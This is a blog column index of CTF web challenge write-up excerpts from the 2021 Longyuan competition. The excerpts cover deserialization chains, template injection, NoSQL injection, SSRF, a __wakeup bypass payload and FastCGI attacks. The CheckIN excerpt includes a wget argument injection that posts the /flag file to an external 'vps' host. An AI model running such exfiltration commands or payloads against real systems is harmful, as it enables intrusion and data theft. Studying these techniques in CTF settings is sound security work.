陇原战疫2021复现
文章平均质量分 77
web复现
Sk1y
每一个不曾起舞的日子都是对生命的辜负
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
陇原战“疫“2021网络安全大赛 Web EasyJaba
恶意字节码加载,Rome链,靶机不出网,使用Hashtable绕过入口类的限制,原创 2022-07-02 19:16:40 · 1622 阅读 · 0 评论 -
陇原战“疫“2021网络安全大赛 Web MagicMail
知识点:本地起一个smtp服务,利用模板注入,找到可用的类文章目录MagicMail注入点测试模板注入参考链接MagicMail注入点这个题目很有意思,赛后根据官方wp进行复现首先是,我们需要输入一个有smtp服务的ip和相应的端口,这个可以在自己的vps起一个smtp服务python3 -m smtpd -c DebuggingServer -n 0.0.0.0:6667输入自己的服务器ip和6667(ip和port根据自己的情况修改)然后就是一个可以发送邮件的功能在email的内原创 2021-11-19 23:51:45 · 3507 阅读 · 0 评论 -
陇原战“疫“2021网络安全大赛 Web CheckIN
checkin文章目录checkinwget外带数据分析官方wpnosql注入ssrf参考链接参考链接:利用命令注入外带数据的一些姿势_一个安全研究员-优快云博客_smb外带注入题目有附件下载,是个go语言,审计一下 ,文件目录如下注意wget还有wget外带数据根据上面的博客,可以执行命令wegt数据外带出来wget?argv=1&argv=--post-file&argv=/flag&argv=http://vps:7777/然后既可以得到flag原创 2021-12-24 00:28:21 · 3378 阅读 · 0 评论 -
陇原战“疫“2021网络安全大赛 Web eaaasyphp
eaaasyphp文章目录eaaasyphp读取phpinfo打fastcgi恶意的ftp服务构造pop链参考链接题目给出了源码读取phpinfo尝试反序列化读取phpinfo但是__wakeup()函数先于destruct函数执行,所以需要绕过:__PHP :: Bug #81151 :: bypass __wakeup?code=C:4:"Hint":0:{}注意这个FPM/FastCGI打fastcgi使用Gopherus生成打fastcgi的payload:gopher原创 2021-12-25 00:33:38 · 3021 阅读 · 1 评论
分享